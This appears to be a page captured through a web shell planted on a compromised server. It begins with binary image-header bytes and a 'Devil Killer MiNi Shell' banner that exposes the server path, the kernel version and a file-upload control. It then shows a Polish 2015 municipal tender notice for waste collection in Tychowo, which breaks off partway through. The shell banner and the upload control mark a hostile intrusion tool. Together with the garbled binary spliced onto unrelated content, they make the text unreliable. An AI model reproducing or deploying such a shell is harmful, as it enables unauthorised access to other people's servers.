JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151030/291230-N-2015.html

<p class="kh_header"><b>Tychowo: Odbieranie i zagospodarowanie odpadów komunalnych stałych zmieszanych oraz odpadów segregowanych z terenu Gminy Tychowo</b><br>
<b>Numer ogłoszenia: 291230 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tychowo , ul. Bobolicka 17, 78-220 Tychowo, woj. zachodniopomorskie, tel. 94 3115130, faks 94 3115566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.tychowo</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych stałych zmieszanych oraz odpadów segregowanych z terenu Gminy Tychowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych objętych systemem gospodarowania odpadami komunalnymi z nieruchomości zamieszkałych z terenu Gminy Tychowo.

Przedmiot zamówienia realizowany będzie na niżej wymienionych warunkach:  
1. Wykonawca będzie realizował usługę odbierania odpadów komunalnych zmieszanych i odpadów ulegających biodegradacji z nieruchomości zamieszkałych i dostarczał je do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych w Sianowie, ul. Łobuszan 80, 76-004 Sianów, której operatorem jest Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Koszalinie;
2. Wykonawca będzie realizował usługę odbierania i zagospodarowanie odpadów komunalnych zbieranych selektywnie z nieruchomości zamieszkałych, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach -tekst jednolity: Dz. U. z 2013 r. poz. 1399 ze zm.. Zagospodarowanie odpadów tj. odzysk lub unieszkodliwienie powinno być zgodne  z obowiązującymi przepisami, w szczególności z ustawą z dnia 14 grudnia 2012 r. o odpadach   -Dz. U. z 2013 r. poz. 21, ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach -tekst jednolity: Dz. U. z 2013 r. poz. 1399 ze zm., Rozporządzeniem Ministra Środowiska z dnia 29.05.2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych -Dz.U.2012.645, oraz wytycznymi zapisanymi w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012-2017 z uwzględnieniem perspektywy na lata 2018-2023, w którym Gmina Tychowo przypisana została do Koszalińskiego Regionu Gospodarki Odpadami oraz zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Tychowo;
3. Wykonawca będzie prowadził obsługę punktu selektywnej zbiórki odpadów komunalnych -gminnego punktu zbierania odpadów, który jest zlokalizowany w Tychowie przy ulicy Bobolickiej 12a, a także  wyposaży go w odpowiednią liczbę pojemników i kontenerów służących do gromadzenia frakcji odpadów zbieranych w sposób selektywny przewidzianych dla pszok w Regulaminie utrzymania czystości i porządku na terenie gminy Tychowo.

Charakterystyka gminy Tychowo i liczba mieszkańców
Powierzchnia Gminy Tychowo wynosi 350,69 km2.

Liczba osób zamieszkałych 5419 -stan na dzień 20.10.2015 r., w tym: Tychowo - 2005, obszar wiejski - 3414.

Na terenie gminy Tychowo znajdują się 42 miejscowości, w tym: miasto Tychowo oraz 41 miejscowości na obszarze wiejskim.


A.	Szczegółowy opis przedmiotu zamówienia

ZABUDOWA JEDNORODZINNA
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpadów komunalnych.
1.	Niesegregowane -zmieszane odpady komunalne -kod odpadu 20 03 01
Niesegregowane -zmieszane odpady komunalne gromadzone będą w pojemnikach. 
Pojemniki nieodpłatnie dostarcza Wykonawca w zależności od potrzeb mieszkańców i ustawi je w miejscu wskazanym przez właścicieli nieruchomości.

Częstotliwość odbioru i wywozu odpadów przez Wykonawcę do wskazanego przez Zamawiającego RIPOK- 1 raz na 2 tygodnie.

2.	Selektywnie zbierane odpady komunalne: papier i tektura, szkło i opakowania szklane, tworzywa sztuczne i opakowania z tworzyw sztucznych, odpady wielomateriałowe, metale -kody odpadów 20 01 01, 20 01 02, 20 01 39, 20 01 40, 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 06, 15 01 07.
Selektywnie zbierane odpady komunalne na terenie zabudowy jednorodzinnej gromadzone będą w workach z folii PE-HD lub innej o podobnej wytrzymałości o pojemności 0,08 - 0,12 m3 -80-120 litrów w kolorach lub nadrukiem dla frakcji:
- niebieski - papier;
- zielony - szkło;
- żółty - tworzywa sztuczne i odpady wielomateriałowe;
- żółty lub pomarańczowy - metal.
Worki dla każdej z frakcji nieodpłatnie dostarcza na teren nieruchomości Wykonawca w zależności od potrzeb mieszkańców -minimum po jednej sztuce dla każdej z frakcji przy każdorazowym odbiorze odpadów zbieranych selektywnie.

Częstotliwość odbioru i wywozu odpadów zbieranych selektywnie przez Wykonawcę - 1 raz na 4 tygodnie.

3.	Odpady ulegające biodegradacji i odpady kuchenne -20 02 01, 20 01 08.
Zbiórka odpadów zielonych i odpadów kuchennych z nieruchomości, które nie deklarowały posiadania kompostownika odbywać się będzie w systemie workowym. Worki o pojemności 0,08 - 0,12 m3 -80 - 120 l w kolorze brązowym nieodpłatnie dostarcza Wykonawca w ilościach uzgodnionych z właścicielem nieruchomości -minimum jedna sztuka na nieruchomość.

Częstotliwość odbioru i wywozu odpadów zielonych ulegających biodegradacji przez Wykonawcę do wskazanego przez Zamawiającego RIPOK - 1 raz na 2 tygodnie.

4.	Odpady wielkogabarytowe (kod 20 03 07),  zużyty sprzęt elektryczny i elektroniczny - kody 20 01 23, 20 01 35, 20 01 36 i zużyte opony -kod 16 01 03.
Zbiórka odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon prowadzona będzie sprzed nieruchomości po wystawieniu ich przez właścicieli, w terminach ustalonych przez Zamawiającego z Wykonawcą. Odebrane podczas zbiórki odpady powinny zostać rozdzielone przez Wykonawcę na frakcje: odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony itd., a następnie zagospodarowane zgodnie z obowiązującymi przepisami.

Częstotliwość zbiórki i wywozu odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego i zużytych opon - 4 razy w roku. 


ZABUDOWA WIELORODZINNA
Na terenie zabudowy wielorodzinnej -spółdzielnie mieszkaniowe, wspólnoty mieszkaniowe obowiązywać będzie system mieszany workowo-pojemnikowy lub pojemnikowo-kontenerowy zbiórki odpadów komunalnych.

1.	Niesegregowane -zmieszane odpady komunalne -kod odpadu 20 03 01
Niesegregowane -zmieszane- odpady komunalne gromadzone będą w pojemnikach lub kontenerach. Pojemniki i kontenery dostarcza nieodpłatnie Wykonawca i ustawi je w miejscu wskazanym przez właścicieli nieruchomości.

Częstotliwość odbioru i wywozu odpadów przez Wykonawcę do wskazanego przez Zamawiającego RIPOK - 1 raz na 2 tygodnie w sezonie zimowym i 1 raz na tydzień w sezonie letnim lub, w sytuacji kiedy zajdzie taka potrzeba, na żądanie Zamawiającego.

2.	Selektywnie zbierane odpady komunalne: papier i tektura, szkło i opakowania szklane, tworzywa sztuczne i opakowania z tworzyw sztucznych, odpady wielomateriałowe, metale -kody odpadów 20 01 01, 20 01 02, 20 01 39, 20 01 40, 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 06, 15 01 07.
Selektywnie zbierane odpady komunalne na terenie zabudowy wielorodzinnej gromadzone będą w pojemnikach lub kontenerach albo workach z folii PE-HD lub innej o podobnej wytrzymałości o pojemności 0,08 - 0,12 m3 (80-120 litrów) w kolorach lub nadrukiem dla frakcji:
- niebieski - papier;
- zielony - szkło;
- żółty - tworzywa sztuczne i odpady wielomateriałowe;
- żółty lub pomarańczowy - metal.
Pojemniki, kontenery lub worki dla każdej z frakcji dostarcza nieodpłatnie na teren nieruchomości Wykonawca w zależności od potrzeb mieszkańców.

Częstotliwość odbioru i wywozu odpadów zbieranych selektywnie przez Wykonawcę - 1 raz na 4 tygodnie lub, w sytuacji kiedy zajdzie taka potrzeba, na żądanie Zamawiającego.

3.	Odpady ulegające biodegradacji i odpady kuchenne -20 02 01,20 01 08.
Zbiórka odpadów ulegających biodegradacji i odpadów kuchennych z nieruchomości, które nie deklarowały posiadania kompostownika odbywać się będzie w systemie pojemnikowo-workowym. Worki o pojemności 0,08 - 0,12 m3 -80 - 120 l w kolorze brązowym lub pojemniki o pojemności dostosowanej do potrzeb nieruchomości dostarcza nieodpłatnie Wykonawca w ilościach uzgodnionych z właścicielem nieruchomości -minimum jedna sztuka na nieruchomość.

Częstotliwość odbioru i wywozu odpadów ulegających biodegradacji przez Wykonawcę do wskazanego przez Zamawiającego RIPOK - 1 raz na 2 tygodnie w sezonie zimowym i 1 raz na tydzień w sezonie letnim lub, w sytuacji kiedy zajdzie taka potrzeba, na żądanie Zamawiającego.

4.	Odpady wielkogabarytowe -kod 20 03 07, zużyty sprzęt elektryczny i elektroniczny - kody 20 01 23, 20 01 35, 20 01 36  i zużyte opony -kod 16 01 03.
Zbiórka odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon prowadzona będzie sprzed nieruchomości po wystawieniu ich przez mieszkańców,  w terminach ustalonych przez Zamawiającego z Wykonawcą. Odebrane podczas zbiórki odpady powinny zostać rozdzielone przez Wykonawcę na frakcje: odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony itd., a następnie zagospodarowane zgodnie z obowiązującymi przepisami.
Częstotliwość zbiórki i wywozu odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon - 4 razy w roku.

PUNKT SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH -gminny punkt zbierania odpadów
Z punktu selektywnej zbiórki odpadów komunalnych w Tychowie przy ulicy Bobolickiej 12a prowadzony będzie przez Wykonawcę odbiór odpadów określonych Regulaminem utrzymania czystości i porządku na terenie gminy Tychowo, takich jak: chemikalia, zużyte baterie i akumulatory, zużyty sprzęt elektroniczny i elektryczny, odpady wielkogabarytowe, w tym meble, zużyte opony i dętki, odpady remontowo-budowlane i rozbiórkowe oraz selektywnie zbieranych frakcji odpadów takich jak: papier i makulatura, szkło i opakowania szklane, tworzywa sztuczne, opakowania z tworzyw sztucznych i odpady wielomateriałowe, metale, odpady ulegające biodegradacji, w tym odpady zielone. Wykonawca na czas realizacji zadania wyposaży nieodpłatnie punkt selektywnej zbiórki odpadów komunalnych w odpowiednie pojemniki, w ilości niezbędnej do jego prawidłowego funkcjonowania i będzie go obsługiwał zgodnie z zatwierdzonym przez Zamawiającego harmonogramem. Przeterminowane leki, po wcześniejszym uzgodnieniu z podmiotem prowadzącym aptekę, odbierane będą także przez Wykonawcę ze specjalnego pojemnika na przeterminowane leki - konfiskatora usytuowanego w aptece przy ulicy Wolności 7 w Tychowie. Pojemnik przeznaczony do zbiórki przeterminowanych leków - konfiskator o pojemności 100 l. lub podobnej zapewni nieodpłatnie na czas realizacji zadania Wykonawca, który ustawi go we wskazanym przez Zamawiającego miejscu.  

Częstotliwość wywozu odpadów z punktu selektywnej zbiórki odpadów komunalnych w Tychowie przy ulicy Bobolickiej 12a prowadzona będzie zgodnie z harmonogramem ustalonym przez obsługującego go Wykonawcę, nie rzadziej jednak niż 1 raz na 4 tygodnie, z wyjątkiem odpadów ulegających biodegradacji, w tym zielonych, które odbierane będą z częstotliwością 1 raz na dwa tygodnie w sezonie zimowym i 1 raz na tydzień w sezonie letnim.
Przeterminowane leki odbierane będą z konfiskatora umieszczonego w aptece - 1 raz na 4 tygodnie lub, w sytuacji kiedy zajdzie taka potrzeba, na żądanie Zamawiającego.
Zamawiający na czas realizacji zadania udostępni nieodpłatnie Wykonawcy nieruchomość, na której zlokalizowany jest punkt selektywnej zbiórki odpadów komunalnych w Tychowie przy ulicy Bobolickiej 12a. Warunki, na jakich nieruchomość zostanie udostępniona przez Zamawiającego  Wykonawcy  określone zostaną odrębną umową.

OKRESOWE MYCIE POJEMNIKÓW NA ODPADY
W ramach wykonywanej usługi Wykonawca, zgodnie z Regulaminem utrzymania czystości i porządku na terenie gminy Tychowo, będzie przeprowadzał okresowe mycie pojemników na odpady. Mycie pojemników powinno być wykonywane preparatami ulegającymi biodegradacji w sposób umożliwiający odprowadzenie powstałych ścieków do kanalizacji sanitarnej lub zbiorników bezodpływowych. Mycie pojemników należy wykonać minimum jeden raz w roku w sezonie letnim. 

B. Wykaz urządzeń do gromadzenia odpadów i sprzętu technicznego
1. Kontenery o pojemności:
- 5,00 m3;
- 7,00 m3
- lub inne o zbliżonej pojemności będące w dyspozycji Wykonawcy.
2. Pojemniki:
- 0,12 m3 -120 l;
- 0,24 m3 -240 l;
- 1,1 m3 -1100 l.
- konfiskator do zbierania przeterminowanych leków
3.  Worki z folii PE-HD lub innej o podobnej wytrzymałości, grubości minimum
     60 mikronów, pojemności od 0,08 m3 -80 l do 0,12 m3 -120 l, w kolorach:
- niebieski - papier;
- zielony - szkło;
- żółty - tworzywa sztuczne;
- żółty lub pomarańczowy - metale;
- brązowy - odpady -zielone.

Wielkość pojemników i kontenerów winna być dostosowana do potrzeb użytkownika.
W trakcie realizacji przedmiotu zamówienia, na wniosek właściciela nieruchomości możliwa będzie zamiana przez Wykonawcę pojemnika na inny o pojemności dostosowanej do potrzeb nieruchomości.
4. Wykonawca powinien posiadać minimum:
- dwa samochody przystosowane do odbierania zmieszanych odpadów komunalnych z pojemników o pojemności 0,12 m3 -120 l, 0,24 m3 -240 l, 1,1 m3 -1100 l;
- dwa samochody przystosowane do odbioru selektywnie zbieranych odpadów komunalnych;
- jeden samochód do odbierania odpadów bez funkcji kompaktującej -kontenerów 5 m3, 7 m3 lub o zbliżonej pojemności będące w dyspozycji Wykonawcy;
- jeden samochód przeznaczony do mycia i dezynfekcji pojemników;
- jeden samochód o obniżonej ładowności do odbioru odpadów komunalnych z miejsc o dojeździe  utrudnionym dla pojazdów o większej ładowności.

Pojazdy winny spełniać wymogi określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości -Dz.U. z 2013 r., poz.122. Pojazdy winny być wyposażone  w urządzenia monitorujące ich położenie w terenie, oparte na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu, miejscach postojów oraz czujników zapisujących dane o miejscach wyładunku odpadów. Wykonawca udostępni Zamawiającemu aplikację umożliwiającą weryfikację tych danych;
  

C. Szczegółowe dane charakteryzujące zamówienie

1. Liczba nieruchomości i miejsc gromadzenia odpadów, z których odbierane będą odpady:

lp	Nazwa miejscowości	Liczba nieruchomości i miejsc gromadzenia odpadów	Liczba osób zamieszkałych
1	Borzysław	52	124
2	Buczki	9	33
3	Bukówko	83	235
4	Bukowo	16	41
5	Czarnkowo	22	77
6	Doble	18	62
7	Dobrówko	29	80
8	Dobrochy	10	17
9	Dobrowo *	183	492
10	Drzonowo Białogardzkie	42	121
11	Dzięciołowo	6	23
12	Giżałki	3	13
13	Kikowo	55	139
14	Kowalki	40	127
15	Krosinko	26	73
16	Liśnica	16	52
17	Modrolas	21	42
18	Motarzyn	24	67
19	Nowe Dębno	1	2
20	Osówko	26	87
21	Pobądz	20	83
22	Podborsko	11	30
23	Retowo	8	27
24	Rudno	8	28
25	Sadkowo	79	214
26	Skarszewice	2	7
27	Sławomierz	1	2
28	Słonino	51	186
29	Smęcino	40	98
30	Solno	2	5
31	Stare Dębno	53	132
32	Trzebiec	17	48
33	Trzebiszyn	27	108
34	Tychowo	441	1405
35	Tyczewo	15	56
36	Warnino	42	141
37	Wełdkowo	10	30
38	Wicewo	51	144
39	Wełdkówko	7	26
40	Zaspy Wielkie	40	129
41	Zastawa	1	3
42	Żukówek	1	3
* ze względu na brak wspólnot z powołanym zarządem, mieszkania w budynkach wielolokalowych -blokach traktowane są jako odrębne nieruchomości.

2. Liczba nieruchomości z zabudową wielorodzinną lub miejscami gromadzenia odpadów, z których odbierane będą odpady:

lp	Nazwa miejscowości	Liczba nieruchomości lub miejsc gromadzenia odpadów	Liczba osób zamieszkałych
1	Tychowo	18	600


Liczba nieruchomości i miejsc gromadzenia odpadów jest wartością szacunkową. Zamawiający zastrzega sobie prawo zmiany liczby nieruchomości i miejsc, z których będą odbierane odpady komunalne. Ich liczba może wzrosnąć lub zmaleć w okresie realizacji zamówienia w zależności od deklaracji jakie zostaną złożone przez właścicieli nieruchomości zamieszkałych, o których mowa w art. 6m ust. 1 ustawy o utrzymaniu czystości i porządku w gminach -Dz.U. z 2013 r., poz. 1399 z późn.zm..

3.	Ilość odpadów komunalnych odebranych z terenu Gminy Tychowo, na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w latach 2012, 2013, 2014 i 2015 wynosi:


Rodzaj odpadu	Ilość odpadów 
w 2012 roku -Mg	Ilość odpadów 
w 2013 roku -Mg	Ilość odpadów
w 2014 roku -Mg	Ilość odpadów
w 2015 roku 
9 miesięcy -Mg 
Niesegregowane odpady komunalne	693,8	711,9	852,9	677,1
Szkło	41,5	56,3	89,4	66,1
Tworzywa sztuczne	16,1	43,5	62,4	57,2
Papier i tektura	1,1	1,1	nie wykazano 
w sprawozdaniach	nie wykazano 
w sprawozdaniach
Odpady zielone	nie wykazano w sprawozdaniach	nie wykazano 
w sprawozdaniach	nie wykazano 
w sprawozdaniach	nie wykazano
w
sprawozdaniach

Metal	0,7	0,9	nie wykazano 
w sprawozdaniach	nie wykazano 
w sprawozdaniach
Zużyty sprzęt elektryczny i elektroniczny, odpady wielkogabarytowe i zużyte opony	22,4	26,7	78,0	65,7
Chemikalia, przeterminowane leki, odpady budowlane, itp.	nie wykazano w sprawozdaniach	nie wykazano 
w sprawozdaniach	
15,0	nie wykazano 
w 
sprawozdaniach



4.	Przewidywana ilość odpadów komunalnych, jakie powstaną na terenie Gminy Tychowo w okresie od 1 stycznia 2016 r do 31 grudnia 2017 r.

Rodzaj odpadu	Ilość odpadów w 
2016 roku -Mg	Ilość odpadów 
w 2017 roku -Mg
Niesegregowane odpady komunalne	895,0	903,0
Szkło	93,0	96,0
Tworzywa sztuczne	80,0	83,0
Papier i tektura	1,0	1,5
Odpady zielone	1,0	1,1
Metal	0,5	0,5
Zużyty sprzęt elektryczny i elektroniczny, 
odpady wielkogabarytowe i zużyte opony	2,0

80,0	2,5

80,0
Chemikalia, przeterminowane leki, odpady budowlane, itp.	16,0	17,0

Wskazane powyżej ilości odpadów są wielkością szacunkową, mogącą ulec zmianie, obliczoną na podstawie liczby mieszkańców ujętych w deklaracjach złożonych przez właścicieli nieruchomości zamieszkałych oraz na podstawie przewidywanej przeciętnej ilości odpadów wytwarzanych przez mieszkańca gminy w 2016 r. wynoszącej ok. 0,216 Mg/mieszkańca/rok i ok. 0,219 Mg/mieszkańca/rok w 2017 r. Wartość ta jest niższa od prognozy wytwarzania odpadów komunalnych przez mieszkańca w ciągu roku, zamieszczonej w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012-2017 z uwzględnieniem perspektywy na lata 2018-2023,  która wynosi:
dla mieszkańców wsi
rok 2016 - 0,257 Mg/mieszkańca/rok;
rok 2017 - 0,260 Mg/mieszkańca/rok;

dla mieszkańców małych miast do 50 tys.
rok 2016 - 0,379 Mg/mieszkańca /rok;
rok 2017 - 0,384 Mg/mieszkańca/rok..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium, w terminie do dnia 17.11.2015 r. do godz. 1200,  w wysokości 10 000 złotych - słownie: dziesięć tysięcy złotych 00/100.
2.	Wadium wnosi się przed upływem terminu składania ofert w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancji bankowych;
4)	gwarancji ubezpieczeniowych;
5)	poręczeniach udzielonych przez podmioty, o których mowa w  art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości -Dz. U. z 2014 r., poz. 1804 z późn. zm.
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy: 
10 8562 0007 0050 0050 2000 0170  z dopiskiem -Wadium - odbiór i zagospodarowanie odpadów komunalnych.                         
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
4.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Miejski w Tychowie, ul. Bobolicka 17, 78-220 Tychowo w sekretariacie pok. Nr 9, a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
5.	Wadium wniesione w pieniądzu przechowuje się na rachunku bankowym.
6.	Zwrot i zatrzymanie wadium nastąpi zgodnie z art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
